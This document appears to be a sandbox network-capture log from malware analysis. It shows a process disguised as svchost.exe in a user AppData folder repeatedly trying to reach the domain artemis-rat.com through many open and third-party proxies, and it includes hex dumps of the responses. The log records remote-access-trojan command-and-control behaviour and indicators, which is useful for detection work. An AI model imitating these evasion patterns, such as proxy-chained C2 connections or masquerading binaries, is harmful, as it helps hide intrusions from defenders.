Mar 9, 2024 13:14:28.920171976 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:29.284703016 CET	1286	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:29 GMT Server: Apache/2.4.56 (Ubuntu) Set-Cookie: PHPSESSID=12d046jnq5gpeh6ed86h14cuti; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 5101 Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
Mar 9, 2024 13:14:29.284719944 CET	1286	IN	Data Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
Mar 9, 2024 13:14:29.284861088 CET	1286	IN	Data Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
Mar 9, 2024 13:14:29.284878969 CET	1286	IN	Data Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
Mar 9, 2024 13:14:29.285059929 CET	298	IN	Data Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69 Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
Mar 9, 2024 13:14:29.285185099 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 a3 9a 71 3e e1 fb 8a 7a 82 ad 5f 4c 44 6a 7a 62 06 14 7e 92 3d 72 09 4c 9f 53 9d 18 5d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheRq>z_LDjzb~=rLS],+0/$#('=<5/artemis-rat.com#pCi\|Es[Wbtk`@E{(^Vm\ WO2]-IeE
Mar 9, 2024 13:14:29.643045902 CET	494	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:29 GMT Server: Apache/2.4.56 (Ubuntu) Content-Length: 312 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2150	192.168.2.5	56680	82.64.77.30	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.038134098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.773663998 CET	555	IN	HTTP/1.1 403 Proxy Error Date: Sat, 09 Mar 2024 12:14:33 GMT Server: Apache X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2151	192.168.2.5	56655	162.55.87.48	5566	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.038175106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.880213976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.194761992 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2152	192.168.2.5	56869	104.16.108.234	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.038733006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.193355083 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2153	192.168.2.5	56871	172.67.69.9	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.038779974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.193126917 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2154	192.168.2.5	56246	120.197.40.219	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.039856911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.711044073 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2155	192.168.2.5	56679	8.222.152.158	55555	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.040364981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.378794909 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2156	192.168.2.5	56733	104.249.29.74	5767	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.040909052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.327056885 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2157	192.168.2.5	55665	51.158.124.167	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.040955067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.145924091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.146533012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2158	192.168.2.5	56589	103.190.54.141	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.041191101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.412157059 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:31.412434101 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a6 de e0 c7 82 c1 3d 2a 72 85 4f aa be ff 34 2d 86 6e 4b 84 ac da f0 bb 68 ef 64 68 83 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR=rO4-nKhdh,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:32.155590057 CET	1286	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 a7 d4 5c 12 42 fe 88 6d 26 b1 99 47 9e 93 12 97 16 72 6d 71 b7 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eR\Bm&GrmqDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:32.155613899 CET	1286	IN	Data Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7 Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5\|0F<Arp'~00tP'S"0*H0G10UUS
